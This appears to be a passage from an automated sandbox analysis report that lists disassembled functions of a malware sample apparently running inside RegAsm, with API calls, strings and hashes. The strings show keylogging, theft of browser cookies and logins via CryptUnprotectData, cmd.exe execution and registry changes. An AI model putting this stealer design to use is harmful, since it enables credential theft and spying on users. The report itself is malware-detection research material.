                                                                                              • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                              • API String ID: 1174141254-1980882731
                                                                                              • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                              • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                              • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                              • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                              Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                                              • String ID: Offline Keylogger Started
                                                                                              • API String ID: 465354869-4114347211
                                                                                              • Opcode ID: 64dafc61654423eae3a0fbe5438306b162becb50c4c83e3e1bc02331eec3325d
                                                                                              • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                              • Opcode Fuzzy Hash: 64dafc61654423eae3a0fbe5438306b162becb50c4c83e3e1bc02331eec3325d
                                                                                              • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                              Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                              • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                                              • String ID: Online Keylogger Started
                                                                                              • API String ID: 112202259-1258561607
                                                                                              • Opcode ID: 96596c8b347fbc26a7a26b2b5d6211d38eccf114500c3d7a40bfe83d515ab29d
                                                                                              • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                              • Opcode Fuzzy Hash: 96596c8b347fbc26a7a26b2b5d6211d38eccf114500c3d7a40bfe83d515ab29d
                                                                                              • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                              Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: CryptUnprotectData$crypt32
                                                                                              • API String ID: 2574300362-2380590389
                                                                                              • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                              • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                              • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                              • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                              Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                              • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                              • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                                              • String ID: Connection Timeout
                                                                                              • API String ID: 2055531096-499159329
                                                                                              • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                              • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                              • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                              • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                              Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw
                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                              • API String ID: 2005118841-1866435925
                                                                                              • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                              • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                              • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                              • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                              Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                              • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                              • RegCloseKey.ADVAPI32(004752D8), ref: 00413893
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: pth_unenc
                                                                                              • API String ID: 1818849710-4028850238
                                                                                              • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                              • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                              • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                              • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                              Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                                • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                              • String ID: bad locale name
                                                                                              • API String ID: 3628047217-1405518554
                                                                                              • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                              • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                              • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                              • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                              Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                              • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                              • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                              • String ID: !D@
                                                                                              • API String ID: 3446828153-604454484
                                                                                              • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                              • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                              • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                              • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                              Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExecuteShell
                                                                                              • String ID: /C $cmd.exe$open
                                                                                              • API String ID: 587946157-3896048727
                                                                                              • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                              • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                              • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                              • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                              Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                              • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                                              • String ID: pth_unenc
                                                                                              • API String ID: 3123878439-4028850238
                                                                                              • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                              • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                              • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                              • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                              Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: GetCursorInfo$User32.dll
                                                                                              • API String ID: 1646373207-2714051624
                                                                                              • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                              • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                              • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                              • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                              Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                                              • API String ID: 2574300362-1519888992
                                                                                              • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                              • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                              • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                              • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                              Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                              • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                              • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                              • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                              Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                              • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                                              • Opcode Fuzzy Hash: 5a84445a6d60efe319971740dde2d2f541f568e0726df331b0a843d8179482b0
                                                                                              • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                                              Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                              • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                              • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                              • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                              Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                                              • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3360349984-0
                                                                                              • Opcode ID: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                              • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                              • Opcode Fuzzy Hash: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                              • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                              Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                              • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                              • API String ID: 3472027048-1236744412
                                                                                              • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                              • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                                              • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                                              • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                                              Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                                                                                                • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                              • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                                              • String ID: [ $ ]
                                                                                              • API String ID: 3309952895-93608704
                                                                                              • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                              • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                              • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                                                                                              • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                              Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                              • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                                              • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                                              • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                                              Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C568
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                              • String ID:
                                                                                              • API String ID: 3919263394-0
                                                                                              • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                              • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                                              • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                                              • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                                              Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandleOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 39102293-0
                                                                                              • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                              • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                              • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                              • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
